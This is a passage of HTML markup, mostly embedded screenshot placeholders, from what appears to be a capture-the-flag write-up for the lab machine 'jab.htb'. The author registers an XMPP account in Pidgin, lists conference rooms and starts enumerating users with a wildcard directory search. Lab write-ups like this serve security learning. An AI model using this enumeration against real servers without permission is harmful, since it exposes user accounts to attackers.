url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAA7DAAAOwwHHb6hkAAACAklEQVR42l1SSXabQBTkGtlYgzWAmBEzAotGoMlx7ESLnCK5RBY5Xo7iG1Tqt2wn9qJe0//T1fWr2thmB9zcWBiNTYwmK9yMLWKF2cJHXnUoKoX6bo+8VCjrHhVhOzGmMxe3c+8dFlYEI45yXC7fkVZ7hOsSab5FGG+4tqh5uCBRXpK4bFFtdiTcYWmFmkAu/Uhq/PrZ4fnPb5zPRySZwjB8pqoOm2aAUkdsSCrKmqbXSmUvBye3jsZHpYbKHfx4mmFlufDCCn6QI6LCMCrhBgVVV9xX7BUIWAujSvezotUwqVaI3whHUx+fRj7mZoS2O6FVJ3T9PXZU2u7O6Id71s+69n9v2H/R39WLr2KNXGjMFh7mS5cIcNce9FjX0QZ61mkVcdrQji0y+it+Sl1Cyoqt7kt4SVJrTw2RKT6YqzUUFcltO1FDtQHHdLwUHm3w/Ay2l3Gf8TvXq8BlT2A7ieYx3iI3Q62w3z9QTYOAiQf0SzyU5BOqjNYb+lezdl3Xaa3VC2Tcd4QCy45huylmLynKD4LRxNZ4Tfa1N57a+u2Op//Spof0Tj2g239F2z+iP3zDdvfIMTZwwxpR2qE/XqCGJ8RZBz9q4PhMP1FoFMM5Xegh33CsOGV0VWg5Kf0RX+gHf3bo0YLPQWxYWmtdl5rJbzkkAUpdznlhyckSvZdQ/gJm/GRVec56YgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="pidgin accept certificate" title="" src="/static/7142703755a4e089f2dc964a95d6b317/cd23f/pidgin-accept-certificate.png" srcset="/static/7142703755a4e089f2dc964a95d6b317/dda05/pidgin-accept-certificate.png 158w, /static/7142703755a4e089f2dc964a95d6b317/679a3/pidgin-accept-certificate.png 315w, /static/7142703755a4e089f2dc964a95d6b317/cd23f/pidgin-accept-certificate.png 468w" sizes="(max-width: 468px) 100vw, 468px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I accepted the certificate and was then prompted to register the user:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 384px; " > <a class="gatsby-resp-image-link" href="/static/eecfbc8a3ae4868f6ddd3e15b4adad94/643d6/pidgin-client-registration.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 86.70886075949367%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAAA7DAAAOwwHHb6hkAAAC7klEQVR42oVUyXLTQBT0T0CceNEy2iVbmyVbli3ZeI2DE4eEchUVqii4caf4Fa5w4sSB4jP4Bn6leTPGSUhccGjNIqmnp1/PVFblObpRgaZig+ktqFoL5XiF1fMrjCcrzJfnWK5eEC6xON2gl40gqx40wxffGnYM0/KhBaeQiw+oMD2AJNvQzUC85KS8v/+B6W0a+2BaW/Q5+Lz6YGy6Mf2foGIZFr5++ogf3z8jn2zwfH2Nm9fvqL3C+mKLxfICl9evcPXyBhebLc7o/fnlFml3iCYJ4WSS4iItSnitCJWo7eLXtzV+flmj7ccIO0MEYQa3lSKifpLSOOoj6z9D2hshToYCQdiH5cREkopWZaSa1FYk5mMUGShDDaoRIMsnKMoFBsUMPSIZlnNBlg2mNDfHYDgT7/I/bVEuxUJ7eyr8UVN81AncP76NumShQeD9hmSiWtNw0jBQa+7QkE3R1sVYpy07t34KQs1oCzLTjqjCp0LVdLZGh7YmMwd5OQEzXRzVZZw0VRzfQ7WhEKENTffvCO+DV3cPXm1JdUgRqZJI0QHUJJ1i5P6tcF96gxRyv7rZWPjnegmaqo0o7ZPhNqp1lRQyHDfUW1Tr/1DIVTlE4ngp2lRpixYQH1st8krDUU0mKETESJkmcCIxUsg99A8otEKEcU5xGdyGl3votEJ00hx+mCBMMjDDEd7t/CSF6gGFe0KeuZiyx2isULZkzYNFWYu7I3iUPZfQZC6e8MrLDo4pDdxn7aGHuyMWwGunsN0OWn4PthNCtgewoglMv4AZlLAjIu5M4URjNPQYdaMH2cpESg4q5MHmoc0pxL6fQnFLlPMNMgrxYLzEeHaGKV0WXQp6taHhaZNSoKe0I+9wbHgEeFD5+VSYB8WgC8MrEOVrWOEMNoG5BVRnCLezQNBbI0wntKvk/znkkIk8If/evH2P6fySLoctuhQpnoZeTgeA1E9o3vN3hXxE+Bi+gKLd9ffQ6Ozv48IX5wp/A0e/DaeBl54LAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="pidgin client registration" title="" src="/static/eecfbc8a3ae4868f6ddd3e15b4adad94/643d6/pidgin-client-registration.png" srcset="/static/eecfbc8a3ae4868f6ddd3e15b4adad94/dda05/pidgin-client-registration.png 158w, /static/eecfbc8a3ae4868f6ddd3e15b4adad94/679a3/pidgin-client-registration.png 315w, /static/eecfbc8a3ae4868f6ddd3e15b4adad94/643d6/pidgin-client-registration.png 384w" sizes="(max-width: 384px) 100vw, 384px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After clicking <code class="language-text">OK</code>, a message was shown confirming successful registration:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 347px; " > <a class="gatsby-resp-image-link" href="/static/9adb2c46bc01e71dd6d6566b4ec018fa/6a735/pidgin-registration-successful.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAA7DAAAOwwHHb6hkAAABvUlEQVR42qVSS3LTQBTUMahKkcj6W1/bkURkWbJlWZ+RLRSDyCZsUtwBFlwgV8iWg+QeVHEM9s2bMYZiCSy6XmnmqV93v5G69RFpXGCiu9CNABPVRXxT4NC/Q8MGVM2AsjoQemzLPRi7hePFUHUfGvUrVE3TgxbdQd58ghQGKQx9jhcXhmi4lG0omo9glsB2I1j2NaYORyi+OWTVwdXEFqQcukGE7hrqrId0cWWhZzU+3I9CXZpVyNe1UPkqKbBMS1xHGZJ0iwXVMM6xyms638Kw5jTcOxFrDlR1CmnuGPj6/Bnfvz1hrF2ECcP9+wf0wx26/Ru8HkZhuWFHtN0RdTvgQHeM4rDshRDBSQUxOZQM08eXjw6eHx2sYheyNqdp3gk0mTfyKDRuzZzBIJzPuELDmsGkWCyKhPdLsuqLn3mwL2UPGdllpOS8hM2WIdu0KEuGhhTv+7dYFwy7XUe1Rb5pUJSdODMtUqgZfFunjelUuQVVD8QQ5Q/4v/PSPUy0n1A9yIr76046b+rvECC82aGoblGzEVU7wgmWgvQfCelZLTJEyQ7LVYM0Z5Rh9H+EE4W/xSkuOeQpkbnC8g8F6j6IBsJX8wAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="pidgin registration successful" title="" src="/static/9adb2c46bc01e71dd6d6566b4ec018fa/6a735/pidgin-registration-successful.png" srcset="/static/9adb2c46bc01e71dd6d6566b4ec018fa/dda05/pidgin-registration-successful.png 158w, /static/9adb2c46bc01e71dd6d6566b4ec018fa/679a3/pidgin-registration-successful.png 315w, /static/9adb2c46bc01e71dd6d6566b4ec018fa/6a735/pidgin-registration-successful.png 347w" sizes="(max-width: 347px) 100vw, 347px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Next, I went to <code class="language-text">Tools</code> → <code class="language-text">Room List</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 455px; " > <a class="gatsby-resp-image-link" href="/static/eb6202315ee9d85b83a2b5303f603efb/d2e8e/pidgin-room-list.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 121.51898734177216%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAYCAYAAAD6S912AAAACXBIWXMAAAsTAAALEwEAmpwYAAACx0lEQVR42pVUyW7bMBDVRxRoNlk7tZHaqN12HBsJ4rRAm0uBnnrvf7T3Av3g1yFdOzGaxsrhQRJFvnnzZjjG7fgAxnI4Hofri8PTdmIIIbF9eMRitQUXLbxAELIj+HQ2jEsE4hru/DuMpl3h+uYeIu9QyBHtsEbdLBDwJdzyEX4yYJyv6VAFy0mJJH8BTwEMng8o5RKp6MGLAXm1RF6OsOMRXvUReXeHqu5pvUPCJWZOCNNmB6hvFkuESQ0WVTCitEVIiA5okBD5uenDcn1SvEDVqEC0L8lwaXm4mLkaZ1cOffv6XMx7fdaIeYd/0SOMUoqcgpctctlpXNkBEXkal1YA02EarxImooMfddiuGyyHChn5WsgeJaXdjddwggTvL224LEXVjhQ0I+W7rP6vkAoR9hS5icjfOW0u8O7M1ClezHyyw9XEoqgRROJ0ymHSUvQBRd2QMvXsdcq2F2kyBaWwJIVRWkxQSHAZB6MilFSQWFSawDzy0MfMDanK7LTCNBsOpufkn0rtwlRVdTWZUqj+OUEM249PEyr5MzeBS/7Ido6mX9BahStStSdUimU3p/3lhJT/RgxTSc0uEdEh5WmY5gcPLVLGSbkf8tOEiRgws0OdklKYUVP7pHZXZe8JpjetsRXhpcVgUVXbYUm9SL7mUjf2+XNCglqbdFOCKEeSVbpd0kySyk4r3hdm76Xqy5hPKIob7NpmWK61f7UqTFbqtPc+qnu9q/JJD6nKNA/VbVCNnWQ1BN1pXjS690xnB8uLEcT5tMbeg8X10SR6/m+//vQ9gVBFPryf2DuJ8C3QhGpcvaTmrVCtFtHTYFGDIKz1GA8iqQ2Ojib469jvZ0yABSmMYX2D1faehucW43JL829Fw4CauTwNUSxoGm2QZQ3kl58oPv+A0W8WuP30ATebR2zuPkM2a73xLYSCV0i//Ubx9Rf+AJIG3MxfdASoAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="pidgin room list" title="" src="/static/eb6202315ee9d85b83a2b5303f603efb/d2e8e/pidgin-room-list.png" srcset="/static/eb6202315ee9d85b83a2b5303f603efb/dda05/pidgin-room-list.png 158w, /static/eb6202315ee9d85b83a2b5303f603efb/679a3/pidgin-room-list.png 315w, /static/eb6202315ee9d85b83a2b5303f603efb/d2e8e/pidgin-room-list.png 455w" sizes="(max-width: 455px) 100vw, 455px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Then, after clicking <code class="language-text">Get List</code>, the dialog box was pre-populated with <code class="language-text">conference.jab.htb</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 575px; " > <a class="gatsby-resp-image-link" href="/static/97ab40a732c297cf772c9f71b4ddae7d/facd4/pidgin-conference-server.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 74.68354430379746%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAA7DAAAOwwHHb6hkAAACjUlEQVR42oVUy3LTQBD0T6Sgkji2ZestrbR6WZZly4nzJAlcAkVyg4/gKzhy48KNa/jCpmftFLhChUPXrlYzrZ7ZafXqrMN4EmM0jgyGVsh1g8EoRBCVUOkMjpfCYtzYVs8gsUcDF4Ohh54f5Ewq4AYZgrhEzOQ4qRGqqVl9Eo6dlInJi5iYGIVepCpkRUuiGlm5wHx5jll7ipqQfZq3GE0ULCf5J8Zb2J42a8+lwrxaUmFh1OligZQfcPzcKLO9zLzzgsKsu8h3niduSkImxnrOcqXMGfvVIM0aeGFJVNt1i7+S5YNOKC2ZGgTxlH3O0BOp5iCq4TBQhQ0GA4X+0GeARjldmZZU9Yr7znxMLm5sx7DyO9iM96OKqE01fwip0HJzLJsSP759wenFLVbra7TdJbqTaz6/w3J1ifXpDdrFGWw3gcqnhkRyhWOHMKTkkVPgYqnx+PUCTc1bjqk4TpEmORKloZISqZ4ZlSEnQ1QKiah7RiiQPg2sGK/2HYypVrfvkbQfkS7vobt7qOoSYTqnsg5xtjBz+V9CMwIOB93lQH/4juzTI9TDT66/YM8/Y+/Axl4/wGsrg2VrbPJfILSeHCBzZqdwedNZ2UHpFm40o0KOVblGQpXiHsnf7aGrt+NRmbkSsomTGEhJQnR+dccLesv9HDnJV+tbXtQNJ2NqZtWI4U3bLgklaWgFOKIPByPfoE9f9o+czRmxfzDBwaHNM5ee9cz+sG+bWIl5yrUmEXryQxDzN+0ZVRam7OUxR6N7w1JXRkFedZg2J/D5bkQB4ialG+NhXR7Told8f7Yp2aJPPZaq6VlZbdonYZlp1rI3leml+DwhgUd3SEUhz2XMJDdgqQlbEdNh0qbfEB/Riv6mA/gAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="pidgin conference server" title="" src="/static/97ab40a732c297cf772c9f71b4ddae7d/facd4/pidgin-conference-server.png" srcset="/static/97ab40a732c297cf772c9f71b4ddae7d/dda05/pidgin-conference-server.png 158w, /static/97ab40a732c297cf772c9f71b4ddae7d/679a3/pidgin-conference-server.png 315w, /static/97ab40a732c297cf772c9f71b4ddae7d/facd4/pidgin-conference-server.png 575w" sizes="(max-width: 575px) 100vw, 575px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I clicked <code class="language-text">Find Rooms</code> and the following rooms were listed:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 577px; " > <a class="gatsby-resp-image-link" href="/static/49b6665d6c40a4b9d4983f2d176c840e/1d708/pidgin-room-list-test.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 74.0506329113924%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAA7DAAAOwwHHb6hkAAABlUlEQVR42uWU2Y7UMBBF8yN0lk7SsbM7i7N0p5dZYEaIZ/7/Ry63LEBIDMOAeOPhZKvyVZVdN541Z0Rx6QijHMEP+KFGN2yYlxsOqkW4z5lX/MQ+qRCnFaLhM7xMG6i8R14NMOOG3t7QjVd09opxvkPTbdDlxPj8KmWz4qB7eEVl0XZHVO2McbnDcXvCcnyP5US2D05cFhT18ksk3vZnqGKQCnuY4YQ0MwxOFF/RmBXJoUWUNoh5T5X5LQnX79MaXpK12C7PbPWC9fxE8fPXNibXqi7tG5mcsBezCrs8YOCeTesj9+zEAxhYvv1jpEpPWpWXLB8dfyP0ouC/4H8VlIs7kGL8fjAvofLX40JyoKB42A803gWZ824Qaez4vAsV/Eg7T+8C5b59e/clRgJ623f5yuWH9LUX7ks644h1e6QXOzekl/tPOF0/csgvdErjhn7iD0KsFcYVTL/RqguipKb/bzTEMyxn2LUcMSGjUE27yX6K5SS5JiofnJ2K2tL8MwfeQArQ3B5B1kpO1Swo65l/nBpfAC1dzn4cnXhMAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="pidgin room list for test account" title="" src="/static/49b6665d6c40a4b9d4983f2d176c840e/1d708/pidgin-room-list-test.png" srcset="/static/49b6665d6c40a4b9d4983f2d176c840e/dda05/pidgin-room-list-test.png 158w, /static/49b6665d6c40a4b9d4983f2d176c840e/679a3/pidgin-room-list-test.png 315w, /static/49b6665d6c40a4b9d4983f2d176c840e/1d708/pidgin-room-list-test.png 577w" sizes="(max-width: 577px) 100vw, 577px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Attempting to join <code class="language-text">test</code> resulted in an error:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 468px; " > <a class="gatsby-resp-image-link" href="/static/f1978821624199bf1b57c68a856da54a/cd23f/pidgin-join-test-error.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 36.075949367088604%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAA7DAAAOwwHHb6hkAAABUUlEQVR42pWRW3KCMBSGWUQfFZGLgEC4UwiIYgEVtTPWl04X0E5nupcur8v5m0SnY2f60ocvOZecPzknUpNvoUxdTFQHhhngvmiQ0weUVQdatciZX6+2KMqWweMtFsuNyKu6B1mZs3oLqkWhFK+QZmaIqlzBtCMEIYUfFojTBdKsRhBRYYcxFT6347RGlJQsVoIEhdj5uTCuYM4TSM/7GPj6wPtLhSBtUdct1t0RXX9Asx7QtAfUyx6H4xmb3Qnd5hF9f0R7ZTecsNs/YdifQPwMUhF7+HxTsLx3MCcUUVyKF/nstVFSids5tptgPLF+kBUb8tTGWL74I8ZUcyFNNIK7UYCxSuCRjLWRCyHeOre5MG/L8TLoM/8XmkEEXEhj8+S2pLPFmBHoIuGJ5F+o14JbEdvNQOsB3fbMPvLySdLtof/Aiw0rguuzkcQLOCQXgt8qwd7aFS8OSQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="pidgin join test error" title="" src="/static/f1978821624199bf1b57c68a856da54a/cd23f/pidgin-join-test-error.png" srcset="/static/f1978821624199bf1b57c68a856da54a/dda05/pidgin-join-test-error.png 158w, /static/f1978821624199bf1b57c68a856da54a/679a3/pidgin-join-test-error.png 315w, /static/f1978821624199bf1b57c68a856da54a/cd23f/pidgin-join-test-error.png 468w" sizes="(max-width: 468px) 100vw, 468px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I was able to join <code class="language-text">test2</code>, but it didn't contain anything useful:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 501px; " > <a class="gatsby-resp-image-link" href="/static/bfe30533f0243262daf2d822e3c69f72/09eb0/pidgin-join-test2.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 110.75949367088609%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAWCAYAAADAQbwGAAAACXBIWXMAAA7DAAAOwwHHb6hkAAACWElEQVR42u1USXLbMBDkVxyJ+76ABAluoiTLVpKqpPKD/P8PnRmQlGxJLqdyzqFrBgTYmA1tpGUNy47xZRtiY0YaT5sARdljnF7Rdkc07RHd8IK2P2JrxZdzKywnheUKPNW/YYRJg6IaIKoRSVYjiGuodg8/LFHVE/rxRL7QRI/I3iOGUeQNWiIQ9R6y2aMkWxFyMaBuDkiLnm4vYHsMcY/LXkHnMhiyHLAbXyDbZ0qJrDpowqo+QHXPyIjQ8QXcoCKU76zjl/CjGl4oteVzRhBWkEUHJTpUmUKVt2h4TRf1coSgtelkOoKZ7C0EhJwwTN90eThigw+bVNStncC0Z8tY07DdnFK5Yk4t1z+HiYTpSbjZAW7c6YsNJjF1l+gH+mAtF8zILj9fLvCu9WRC3ncpZY6YfSOKJBR1uaX0akqToajjqhzRyR1KSt+hw1wnhrvaQF4JlxJoQi5sGDcLaGyouOxHiUJMCJai39evekyYZB263VddWO5y27+ip/W4/47p+AOn8y8cTj8RpUp39VNCroW/tH1t/+ozQo6SIv7rCB+PwwyH5o2juo3snwk/w3/CK+F1zuSCt4NM/rJ2b+YxTOp7QtPJ6e1ml+c1S5XAxhHgPfa3ZNnnPcbaeT+qtGSta03oUQSsyBEJbZANSEkHefaGVqFpdgjIb9UOtSKNpOeY5p2WqUeY3zL90I9nLahBNqIkUc3EiKlrMIxHumBE3+2xm876BUl1/LCmmtAncbC9dXiv1vLogDcPNFtrUWjeX+t7Cy6ZcZGuO92718FVCz/C1k7xB9qvr6Bte5YYAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="pidgin join test2" title="" src="/static/bfe30533f0243262daf2d822e3c69f72/09eb0/pidgin-join-test2.png" srcset="/static/bfe30533f0243262daf2d822e3c69f72/dda05/pidgin-join-test2.png 158w, /static/bfe30533f0243262daf2d822e3c69f72/679a3/pidgin-join-test2.png 315w, /static/bfe30533f0243262daf2d822e3c69f72/09eb0/pidgin-join-test2.png 501w" sizes="(max-width: 501px) 100vw, 501px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>To enumerate users, I went to <code class="language-text">Accounts</code> → <code class="language-text">test@jab.htb/ (XMPP)</code> → <code class="language-text">Search for Users...</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 613px; " > <a class="gatsby-resp-image-link" href="/static/3850728687784371ad5dca9e28c83d05/542a9/pidgin-search-for-users.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 90.50632911392405%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAYAAABb0P4QAAAACXBIWXMAAAsTAAALEwEAmpwYAAACW0lEQVR42q2US2/TQBSF8ycaO0mTun6P3+N3YtdOUkAFBIVK7BCISrRdIXXBlgVbflFbdvywwx0nWUQgSiiLo7HH8jdn5tw7vWm6gMViaEbY6VD34Xg52sVTpFlDcwF0M4RKo2r49BzAZCkU/gbSsII0OEJ/UKEvV9iTp+glaYOibKE6NbToOQyvQhSG8LwAvuvjYKJAUVToqg5dYwTk3cKKFhKsJuicgASVawJW6NluDkaO9OwUwck1pq8+I3n2CRnJas4xzt9jUn6A9+QaVnFGu+FwgwLMzTCa5JCHBeRRBmmUELhEj3kFbPoYnn5F/PE7Zlc3yC9uUV7dori8g/3uDubbG7DzH9Aef4FhmuBZBT9KMVENDCeHJLUbpREXDmk1AXVSWHYI09oWYys5TgRVbNnyEMbin4ggOuR9AdM6qDSKhcO8AzK/hONPfxFbywkqqBSOAEZJgSgtaZ7jQLO3gaszLO6VQwuKpDUCJnnVQXk2pXcXg7H670Dd9gk0Q5iUsNywczcYaw8B0pbTKZ1jjoDkBDF949hXNPSHfDegRmdosABJUUPRHSobi5xtZHSl89fAlfKuxMRo2Ckl3JAWBKLCHgrVuwI3bguYdkawOekRAalbRMc8CMg2wOMVcNRSp/wXh8tt4K6wTUAmK7aBw4ZEl4NYSdi3qPXEgd8vCoYuCF0TBT1fhzJfh0LAuKwR5y1VfkMNX8EL/6Qank/1V72G215AkgtIncO2C2RPhDI7brE8eYH58iXibE7QGgE/+q183oBHBV1zl3DOvkHqc0hj4bBeA2f4CTCqKscvAT0cAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="pidgin search for users" title="" src="/static/3850728687784371ad5dca9e28c83d05/542a9/pidgin-search-for-users.png" srcset="/static/3850728687784371ad5dca9e28c83d05/dda05/pidgin-search-for-users.png 158w, /static/3850728687784371ad5dca9e28c83d05/679a3/pidgin-search-for-users.png 315w, /static/3850728687784371ad5dca9e28c83d05/542a9/pidgin-search-for-users.png 613w" sizes="(max-width: 613px) 100vw, 613px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The dialogue box to select a user directory was pre-populated with <code class="language-text">search.jab.htb</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 302px; " > <a class="gatsby-resp-image-link" href="/static/a90c53a36b64276e570448d26eb90714/7ed70/pidgin-user-directory.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 69.62025316455697%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAA7DAAAOwwHHb6hkAAAC+0lEQVR42k2Ty5LaVhCGeQMv4ioTg9ANJDG6AwIEAgkGBGKYQWGIJzCJPbYTe+OFvfPCVa6aqsSpvENW8Rt476fwNtmkyklllUX2f/ocSMaLr7p1us+vVre6kA1zTKIFpKqJmu5BrTnQ6w1MZyvEyRxhb4x0foYh+ek8x2g0RzzKYNoBz1U1uqPUIIdPICUvUYjbEzSsELeLKiS5DkkxIRKNYIhGK4Lnhwg6MVy/hyY/6xMD6IaHilQnUReqakBprKF0HqBQFAzk8wTPnjxEmj/kAv3BFH6zz6twGyRAvuN10Q1HJDrgMSbaag+5sMIqJVFV0VDYpA7++PAz/vr9PR5/d4WgO8H28op4hGyRY7m6wHZ3hfX5FuebLdabS3x9/zG+ON/h3sU3CNoD+ioLVdYuzUUhP7bx6y9t/Pa2g/XUxp2yiXJFQ0nQIYgGhIrO/XLFIKvhbpliDDovU1yUjwgTsmrznhYExcWyZ2A9pMuShRZ90izLEQ0mGMZT9KIpBsynYYzGjIwGRGfDCScmP45TOG6bRC0UmGqZREsy9aJqo261qWcRHKdFBJRIfSQsu0n9jNDspmh0aJDBGD4NtNmdwguOYdg9fp8LVjWGi2rNgqh3IUQvoMx+QHV2DWV6DTW9hr54AzHY4Y7koah2iPaBgFPS+pDr0V5wDxO0UdEChE/fYfHj35i8/oj0+k9k33/E6U//oLV6hduf3cLngoRiSbjhbglFQYVsJntBViqDVSgbIUTvDJK/QsUlS77oMZ+wZqgcxUSCSj2ByOz/jKEY3b0g2xCNtkOk8fMXUKWySptDvqbvK6/V7EPM46iav7eH56ruk896SL3zghGc5gjfPn2O1eYBptmXWJxtabKnvPFHdhduK8Eyv6T12yBbXuBktUN2eoF0cY/sVzSk5GYoltvnnOY7JJMVBskJRmTb4QSOP4BxFMB0QiTHZ4jHS3rRCaJ4cfCXPNfx+zeC/yGI+13m+0w/rFy18Wl8f24ecqxPck0uxn7sfwGn68yDRH1r2QAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="pidgin user directory" title="" src="/static/a90c53a36b64276e570448d26eb90714/7ed70/pidgin-user-directory.png" srcset="/static/a90c53a36b64276e570448d26eb90714/dda05/pidgin-user-directory.png 158w, /static/a90c53a36b64276e570448d26eb90714/7ed70/pidgin-user-directory.png 302w" sizes="(max-width: 302px) 100vw, 302px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I clicked <code class="language-text">Search Directory</code> and entered the wildcard character (<code class="language-text">*</code>) into the search field:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 507px; " > <a class="gatsby-resp-image-link" href="/static/04ec0b6dd51f4dbdfa96dc92c59c76e4/4dbef/pidgin-advanced-user-search.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 61.39240506329114%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAA7DAAAOwwHHb6hkAAAB90lEQVR42o1SyXKbQBTkL7LYMWIRCNDAsA07khBCpSgu+5Ack6MrB6cq+cZ8Tb6i8xhLslR2qnJoHjM106+75yll3OH6gw114mCiexLqxIXlRCiqHmm2gCiWqOoNAp5DNxmMqX+Bqc1hOgKa+AolYBzfHx7Q9neIkopQI04biHwpayJa8KiURLrBZNWM+QVGEa6fggUxlG93Kf78/oUv9z3yeothe4vV+iO6fo/laoduvUfdbuCxFDM3lnC8BC7BYwJzP5NrmxxZDofiOnPsMhXOzEdJthq6XDeEdsBiuSXbHe2v0W8+EfkOzYLOLLYQWYuMXGQURyIaSTg6UHTK4FoLYVj80FGAUVYsyODzAkFYwA8reH6OeVDSfy2rTudV3ScwTMznPJXxY06ZDDZNK0nw9DiHfAwfmtfixhZ4o3G81UO80yO8N2NcmQmuDKp2TYJIFPEop9eyAjCxJ4W5lD/CPOzrTg7NTqFOY6hWIuvNCRE1y6TDk8IROskOtz+RVQOKspOv/TwaTJL/G+zS8pEwGh6REyEPc6ia92LeZDyk+IjzvVcJ+fADadGD80yuXyMcG8mMKd+ne0yujwOvnB/W7QTmOPVnHS8RYNh9xmpzj6rdwZ1niESHZnWLWKxeEv4PYrFEmLQ0DRWsWQSX5QiiRpKPhH8BwJRzAZMJ5oMAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="pidgin advanced user search" title="" src="/static/04ec0b6dd51f4dbdfa96dc92c59c76e4/4dbef/pidgin-advanced-user-search.png" srcset="/static/04ec0b6dd51f4dbdfa96dc92c59c76e4/dda05/pidgin-advanced-user-search.png 158w, /static/04ec0b6dd51f4dbdfa96dc92c59c76e4/679a3/pidgin-advanced-user-search.png 315w, /static/04ec0b6dd51f4dbdfa96dc92c59c76e4/4dbef/pidgin-advanced-user-search.png 507w" sizes="(max-width: 507px) 100vw, 507px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" 